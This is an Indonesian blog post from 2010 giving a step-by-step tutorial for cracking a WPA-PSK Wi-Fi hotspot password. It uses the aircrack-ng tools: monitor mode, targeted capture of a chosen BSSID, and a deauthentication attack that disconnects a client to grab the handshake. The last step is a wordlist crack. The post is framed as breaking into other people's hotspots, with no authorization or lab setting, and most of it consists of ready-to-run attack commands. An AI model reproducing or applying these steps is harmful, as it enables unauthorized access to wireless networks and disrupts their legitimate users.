' Tutorial Cara Cracking / Bobol Password Hotspot WPA-PSK Dengan Linux Ubuntu Tutorial Cara Cracking / Bobol Password Hotspot WPA-PSK Dengan Linux Ubuntu | Kluwan Backtrack Tutorial Cara Cracking / Bobol Password Hotspot WPA-PSK Dengan Linux Ubuntu

Rabu, 21 April 2010

Tutorial Cara Cracking / Bobol Password Hotspot WPA-PSK Dengan Linux Ubuntu

Kali ini, aku akan mencoba sedkit memberi penejelasan bagaimana sih cara membobol password hotspot yang bertipe wpa-psk dengan mudah.
Cara ini bisa menggunakan linux backtrack 4 dinal release atau linux apapun tertama asal sudah terinstall aplikasi aircrack-ng. Nda berlama-lama mari simak artikel berikut.
Pertama, siapkan CD Live Backtrack atau bisa make linux ubuntu dengan menginstall aplikasi aircrack-ng. Ketik perintah di bawah untuk menginstall aircrack-ng di linux ubuntu
sudo apt-get install aircrack-ng
Kedua,  masuk ke dekstop dengan perintah ~# startx (untuk yang make backtrack)
Ketiga,  buka konsole (terminal) dan ketikkan perintah untuk melihat interface device yang ada
sudo su
ifconfig -a
Keempt, ketikkan perintah di bawah untuk mengaktifkan interface wlan0
ifconfig wlan0 up
Kelima, sekarang gunakan aplikasi airmon-ng untuk airmon-ng membuat virtual interface mode monitor dengan mengetikkan perintah di bawah.
airmon-ng start wlan0
Keenam, monitorlah jaringan di sekitar kamu. Caranya ketiklah perintah ini.
airodump-ng mon0
cat : mon0 adalah interface virtual hasil dari airmon-ng tadi
Ketujuh, fokuskan monitoring jaringan hotspot yang ingin kita bobol passwordnya. Ketik lagi perintah berikut.
airodump-ng -w coba –channel 11 –bssid 001122334455 mon0
ket: memonitoring khusus jaringan yang memiliki bssid 00:11:22:33:44:55 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama ‘coba’
Selanjutnya, gunakan serangan dengan cara disconnect salah satu client  untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3 mon0
ket: aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth
Terakhir, setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah
aircrack-ng coba*.cap -w /pentest/passwords/wordlists/listpass.txt
ket : listpass.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/listpass.txt
Oiya, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya. Jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang kita miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal. Dan akhirnya, yang sedikit dari aku ini semoga membantu buat pengetahuan yang belum tau aja. Selamat mencoba

Anda Sudah Baca Yang Ini? :

0 komentar:

Klik Here To Show All Comment


Posting Komentar

newer page older page home
top